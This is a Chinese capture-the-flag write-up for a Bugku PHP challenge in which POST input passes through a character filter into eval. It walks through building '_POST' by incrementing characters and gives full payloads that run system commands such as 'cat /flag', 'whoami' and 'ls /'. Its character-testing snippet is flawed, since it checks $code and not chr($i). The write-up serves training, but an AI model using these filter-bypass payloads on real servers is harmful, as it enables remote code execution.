赞
踩
1.代码审计
2.题目代码如下所示
<?php error_reporting(0); highlight_file(__FILE__); if (isset($_POST['code'])) { $code = $_POST['code']; if (strlen($code) <= 105){ if (is_string($code)) { if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){ eval($code); } else { echo "Hacked!"; } } else { echo "You need to pass in a string"; } } else { echo "long?"; } }
3.思路:看到preg_match()
函数,首先想到的是使用数据进行绕过,奈何前面有个is_string()
进行认证,只能使用字符串的类型进行输入。
4.调试源代码进行测试,查看还有哪些字符没被过滤
<?php
for ($i=32;$i<127;$i++){
if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){
echo chr($i);
}
}
5.但是得到的不是我想要结果,这里就相当于留了一个问题,还请各位大佬在评论区或者私信指导我一下,十分感谢。
6.通过阅读代码,没有过滤的就是知道$_+.;
,毫不夸张的说这道题目解题的思路比较新颖,使用了自增的方式,当然一提到自增,你可能就会想起程序设计中的i++
,++i
,其实这样理解的话,也没什么问题,但是真正有趣的就是,这里直接自增的是字符串里的字母,我就是一个字符一个字符的调的,我还是相信那就话,慢就是快。
<?php $_=(_/_._)[_]; //var_dump($_); //"N" $_++; //"O" //var_dump($_++); $__=$_.$_++; //"PO" $_++; //"Q" //var_dump($_++); $_++; //"R" $_++; //"S" //var_dump($_++); $__=$__.$_; //"POS" //var_dump($__); $_++; //"T" //var_dump($_++); $__=$__.$_; //"POST" //var_dump($__); $_=_.$__; //_POST //var_dump($_); $$_[_]($$_[__]); //&_=system&__=cat /flag //code=$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);&_=system&__=whoami
7.感兴趣额的话,可以在在本地搭建环境进行调试,但是值得注意的一点就是php
的版本建议使用php7.0
及以上,我在本地上使用php5.3
,php5.4
的时候一直报错,真的很坑最后的$$_[_]($$_[__]);
这个参数,需要进行传参,不然的话会报错,如果顺利的话,直接可以rce
8.直接在bugku
的环境中进行测试,也是比较顺利的
9.查看根目录下的文件ls /
构造的payload
如下:
code=$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);&_=system&__=ls /
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。